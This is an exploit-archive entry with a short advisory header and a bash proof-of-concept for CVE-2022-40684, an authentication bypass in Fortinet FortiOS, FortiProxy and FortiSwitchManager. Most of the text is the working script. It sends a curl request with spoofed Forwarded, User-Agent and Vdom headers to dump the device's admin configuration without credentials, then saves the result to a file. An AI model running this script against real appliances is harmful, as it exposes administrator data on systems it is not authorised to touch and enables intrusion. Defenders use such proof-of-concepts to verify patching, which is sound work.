Authored by Felipe Alcantara

Fortinet FortiOS, FortiProxy, and FortiSwitchManager version 7.2.1 suffers from a authentication bypass vulnerability.

advisories | CVE-2022-40684

# Exploit Title: Fortinet Authentication Bypass v7.2.1 - (FortiOS, FortiProxy, FortiSwitchManager)
# Date: 13/10/2022
# Exploit Author: Felipe Alcantara (Filiplain)
# Vendor Homepage: https://www.fortinet.com/
# Version:
#FortiOS from 7.2.0 to 7.2.1
#FortiOS from 7.0.0 to 7.0.6
#FortiProxy 7.2.0
#FortiProxy from 7.0.0 to 7.0.6
#FortiSwitchManager 7.2.0
#FortiSwitchManager 7.0.0
# Tested on: Kali Linux
# CVE : CVE-2022-40684

# https://github.com/Filiplain/Fortinet-PoC-Auth-Bypass

# Usage: ./poc.sh <ip> <port>
# Example: ./poc.sh 10.10.10.120 8443

#!/bin/bash

red="e[0;31m33[1m"
blue="e[0;34m33[1m"
yellow="e[0;33m33[1m"
end="33[0me[0m"

target=$1
port=$2

vuln () {

echo -e "${yellow}[+] Dumping System Information: ${end}"

timeout 10 curl -s -k -X $'GET'
-H $'Host: 127.0.0.1:9980' -H $'User-Agent: Node.js' -H $'Accept-Encoding": gzip, deflate' -H $'Forwarded: by="[127.0.0.1]:80";for="[127.0.0.1]:49490";proto=http;host=' -H $'X-Forwarded-Vdom: root' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' "https://$target:$port/api/v2/cmdb/system/admin" > $target.out
if [ "$?" == "0" ];then
grep "results" ./$target.out >/dev/null
if [ "$?" == "0" ];then
echo -e "${blue}Vulnerable: Saved to file $PWD/$target.out ${end}"
else
rm -f ./$target.out
echo -e "${red}Not Vulnerable ${end}"
fi

else

echo -e "${red}Not Vulnerable ${end}"
rm -f ./$target.out

fi


}

vuln